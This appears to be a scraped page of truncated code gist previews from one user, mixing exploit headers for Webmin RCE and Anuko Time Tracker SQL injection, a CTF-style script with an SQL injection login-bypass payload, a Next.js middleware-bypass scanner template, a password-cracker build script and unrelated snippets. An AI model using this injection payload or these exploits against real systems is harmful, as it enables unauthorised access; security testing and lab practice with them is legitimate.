rudSarkar

# Exploit Title: Webmin < 1.997 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: < 1.997
# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-36446

import argparse

rudSarkar

# Exploit Title: Anuko Time Tracker - SQLi (Authenticated)
# Date: 2022-05-03
# Exploit Author: Altelus
# Vendor Homepage: https://www.anuko.com/
# Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d
# Version: Anuko Time Tracker 1.20.0.5640
# Tested on: Linux
# CVE : CVE-2022-24707
# Reference: https://www.exploit-db.com/exploits/50915

rudSarkar

"""
 Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.
"""

import requests

url = "http://10.129.247.185:3002/wsdl"

username = "admin' or '1'='"
password = "password"

rudSarkar

# Copyright 2023 Specter Ops, Inc.
#
# Licensed under the Apache License, Version 2.0
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,

rudSarkar

package main

import (
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"strings"
)

func main() {

rudSarkar

#!/bin/bash

"""
Run this script as sudo
"""

wget https://www.python.org/ftp/python/2.7/Python-2.7.tgz
tar xvzf Python-2.7.tgz
cd Python-2.7/
./configure

rudSarkar

metadata:
    language: v2-beta
    name: "CVE-2025-29927 - Next.js middleware bypass"
    description: "Checks for differences in responses when using different x-middleware-subrequest header paths"
    author: "Chris Grieger - blueredix.com"
    tags: "next.js", "middleware"

run for each:
    middleware_value = "pages/_middleware",
                       "middleware",

rudSarkar

{
    "keys": [
        {
            "alg": "RS256",
            "kty": "RSA",
            "use": "sig",
            "e": "AQAB",
            "n": "l0mVxbXIkEzcxc35apZ2TakAc8PSjk7xWsA94zBPq2tWqrFcZjdrG7Fs9gxIFHvYqDCUk4f_WD6EpriemIDxUaMaJkTM7LM279h-kBff4DqlGQmuEZIKnS_Z6Fm2cuoXTIf-NW9J5GVllkawSMStCcqRXcRwh3QisOJV9ZUSXVNK_n6qpZEwoAanw-qpsqKIvpZ3spdZRL1VDpYWs8dDaI6gENBwnZjPOCPWklvkV3Fhk3CPSynGRPF07Nhajgo4k-xR1F3LZFkYXaHrGaXS8WMrDg9fPSC1q36s0N8c4ZX0UaQtGswpR6T6iPO9Tqlm_u_gjM2OKZ9dWN6jOH6xUQ",
            "kid": "0bd77b48-a5a2-49e3-9a30-5962f875bfa3"
        }

rudSarkar

#!/bin/bash
# John 1.9.0 Jumbo-1
apt-get update && apt-get install -y git build-essential libssl-dev zlib1g-dev yasm libgmp-dev libpcap-dev libbz2-dev libgomp1 && git clone https://github.com/magnumripper/JohnTheRipper.git /jtr && rm -rf /jtr/.git && cd /jtr/src && ./configure && make -s clean && make -sj4 && make install && apt-get -y remove --purge git build-essential libssl-dev zlib1g-dev yasm libgmp-dev libpcap-dev libbz2-dev && apt-get -y autoremove && apt-get -y clean && rm -rf /var/lib/apt/lists/*

rudSarkar

git branch | grep -v 'main' | xargs git branch -d